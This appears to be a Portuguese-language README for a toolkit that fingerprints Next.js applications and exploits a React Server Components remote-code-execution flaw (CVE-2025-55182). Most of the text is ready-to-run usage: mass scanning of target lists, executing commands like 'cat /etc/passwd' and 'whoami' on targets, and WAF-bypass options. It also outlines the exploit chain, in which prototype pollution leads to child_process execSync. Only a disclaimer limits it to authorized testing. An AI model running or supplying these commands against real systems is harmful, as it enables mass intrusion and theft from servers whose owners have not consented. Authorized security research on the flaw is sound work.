
Kit automatizado de detecção e exploração para CVE-2025-55182, uma RCE crítica nos componentes do servidor React do Next.js. Inclui fingerprinting em múltiplas camadas, bypass de WAF e varredura em massa para testes de penetração.
Uma ferramenta abrangente de pesquisa em segurança para testar a vulnerabilidade de Execução Remota de Código (RCE) em Next.js React Server Components (CVE-2025-55182).
Este kit de ferramentas oferece capacidades automatizadas de detecção e exploração para CVE-2025-55182, uma vulnerabilidade crítica de RCE que afeta aplicações Next.js que utilizam React Server Components. O kit consiste em três componentes integrados:
requestspip3 install requests
git clone https://github.com/yourusername/CVE-2025-55182-poc-tool.git
cd CVE-2025-55182-poc-tool
chmod +x exploit.sh auto_exploit.sh
A maneira mais rápida de varrer e explorar alvos:
# Create a file with target URLs (one per line)
echo "https://example.com" > targets.txt
# Auto-scan and exploit in one command
./auto_exploit.sh -i targets.txt -s -c "id"
Identifique aplicações Next.js sem exploração:
python3 NextApp.py targets.txt
Arquivos de saída:
confirmed_nextjs_targets.txt - Todas as aplicações Next.js detectadashigh_confidence_nextjs_targets.txt - Apenas detecções de alta confiançaTeste alvos individuais:
# Basic exploitation
./exploit.sh -d https://target.com -c "whoami"
# With WAF bypass
./exploit.sh -d target.com -c "cat /etc/passwd" -w
# Custom WAF bypass size
./exploit.sh -d target.com -c "ls -la" --waf-bypass --waf-size 256
# Skip SSL verification
./exploit.sh -d https://target.com -c "id" -k
./auto_exploit.sh -i targets.txt -s -c "whoami"
# Step 1: Detect Next.js applications
python3 NextApp.py targets.txt
# Step 2: Exploit confirmed targets
./auto_exploit.sh -c "id"
# Full auto-scan with WAF bypass
./auto_exploit.sh -i targets.txt -s -w --waf-size 256 -c "whoami"
# Custom delays and timeouts
./auto_exploit.sh -i targets.txt -s --delay 5 --timeout 30 -c "id"
# Skip SSL verification in bulk mode
./auto_exploit.sh -i targets.txt -s -k -c "hostname"
python3 NextApp.py <targets_file>
Argumentos:
targets_file - Arquivo de texto contendo URLs de alvos (um por linha)./exploit.sh [OPTIONS]
Opções:
| Opção | Descrição | Padrão |
|---|---|---|
-d, --domain | Domínio/URL do alvo | http://localhost:3000 |
-f, --file | Arquivo com lista de alvos | - |
-c, --command | Comando a executar | id |
-w, --waf-bypass | Ativar bypass de WAF | Desativado |
--waf-size SIZE | Tamanho dos dados de bypass de WAF (KB) | 128 |
--timeout SECONDS | Timeout da requisição | 15 |
-k, --insecure | Ignorar verificação SSL | Desativado |
--user-agent AGENT | User-Agent personalizado | Mozilla/5.0... |
-h, --help | Mostrar mensagem de ajuda | - |
./auto_exploit.sh [OPTIONS]
Opções:
| Opção | Descrição | Padrão |
|---|---|---|
-i, --input FILE | Arquivo de entrada de alvos | confirmed_nextjs_targets.txt |
-o, --output FILE | Arquivo de saída de resultados | exploit_results.txt |
-c, --command CMD | Comando a executar | id |
-w, --waf-bypass | Ativar bypass de WAF | Desativado |
--waf-size SIZE | Tamanho do bypass de WAF (KB) | 128 |
--timeout SECONDS | Timeout da requisição | 15 |
-k, --insecure | Ignorar verificação SSL | Desativado |
--delay SECONDS | Atraso entre requisições | 2 |
-s, --scan | Auto-varredura primeiro para Next.js | Desativado |
-h, --help | Mostrar mensagem de ajuda | - |
Gerado por NextApp.py - contém todas as URLs identificadas como aplicações Next.js.
Gerado por NextApp.py - contém apenas detecções Next.js de alta confiança (pontuação de confiança 100+).
Gerado por auto_exploit.sh - relatório abrangente de exploração incluindo:
O scanner utiliza múltiplas técnicas de detecção com um sistema de pontuação de confiança:
x-nextjs-*, x-vercel-*x-powered-by: Next.js__NEXT_DATA__ (100 pontos)_next/* (25-75 pontos com base na quantidade)__NEXT_DATA__, __NEXT_LOADED_PAGES__middlewareManifest, self.__RSC_MANIFESTLimiares de Confiança:
O exploit aproveita uma cadeia de poluição de protótipo nos React Server Components do Next.js:
__proto__ via desserialização JSON_response._prefixprocess.mainModule.require('child_process').execSync()X-Action-RedirectO kit de ferramentas inclui capacidades integradas de bypass de WAF:
Ative com as flags -w ou --waf-bypass.
# Create target list
cat > targets.txt << EOF
https://app.example.com
https://dashboard.example.com
https://admin.example.com
EOF
# Run unified scan
./auto_exploit.sh -i targets.txt -s -c "whoami"
# Check results
cat exploit_results.txt
./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256
# Step 1: Detect and filter
python3 NextApp.py targets.txt
# Step 2: Exploit high-confidence only
./auto_exploit.sh -i high_confidence_nextjs_targets.txt -c "id"
Esta ferramenta destina-se apenas a testes de segurança autorizados e fins de pesquisa. Os usuários devem:
O acesso não autorizado a sistemas de computador é ilegal. Os autores não assumem nenhuma responsabilidade pelo uso indevido desta ferramenta.
Agradecimentos aos pesquisadores de segurança que descobriram e divulgaram esta vulnerabilidade:
Contribuições são bem-vindas! Por favor:
Para problemas, perguntas ou solicitações de funcionalidades, por favor abra uma issue no GitHub.
Este projeto é fornecido para fins educacionais e de testes de segurança autorizados. Use de forma responsável e ética.